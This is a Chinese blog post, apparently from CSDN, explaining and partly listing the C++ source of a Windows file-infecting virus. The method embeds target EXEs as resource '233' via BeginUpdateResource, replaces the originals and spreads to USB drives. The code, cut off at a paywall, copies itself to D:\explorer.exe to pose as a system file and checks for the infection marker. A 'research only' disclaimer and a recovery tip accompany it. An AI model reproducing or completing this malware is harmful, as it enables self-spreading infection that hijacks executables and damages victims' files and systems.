本文探讨了使用C++编程实现病毒的简单原理,通过BeginUpdateResource函数感染EXE文件,详细解释了病毒如何复制自身并替换原文件。作者强调此知识仅供研究,不应用于非法活动。同时,提供了恢复被感染文件的方法,即释放EXE文件中的'233'号资源。
Virus(病毒)极其简单与脑残,但也可以毁灭许多资料…..
原理就是通过BeginUpdataResourse来感染EXE
先复制一个自己,然后将目标文件作为资源添加至复制文件中
再复制那个做了手脚的文件去替代原exe文件
相当于吞掉了原文件。。。
然后就是COPY COPY COPY COPY和COPY To Usb
反正仅供研究
若有人拿去做非法的活动,与本人无关。。。。。。
仅供研究仅供研究仅供研究仅供研究仅供研究仅供研究仅供研究仅供研究仅供研究仅供研究仅供研究仅供研究仅供研究究。。。。。
想要恢复只要将感染文件中的’233’号资源释放即可
#include<windows.h>
#include<tchar.h>
#include "resource.h"
#include<iostream>
#include<string.h>
#include<ctype.h>
#include<stdio.h>
//MAKEINTRESOURCE(IDR_EXE1)
#define DEVFILE "C:\\Program Files (x86)\\Dev-Cpp\\devcpp.exe"
HHOOK hook;
void KillExeFile(char *str)
{
for(int i=0;i<=strlen(str);i++)
if(str[i]=='$')
return ;
DWORD dwFileSize,dwBytesRead;
HMODULE hLib=LoadLibraryA(str);
HRSRC HResource;
PBYTE lpBuffer;
char This_File[256];
memset(This_File,0,256);
GetModuleFileNameA(NULL,This_File,256);
CopyFileA(This_File,"D:\\explorer.exe",false);
if(hLib==NULL)
return ;
HResource=FindResource(hLib,MAKEINTRESOURCE(233),RT_RCDATA);
if(HResource!=NULL)
{
FreeLibrary(hLib);
return ;
}
HANDLE hFile=CreateFileA(str,GENERIC_READ,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(hFile==
最低0.47元/天 解锁文章
扫一扫
19万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
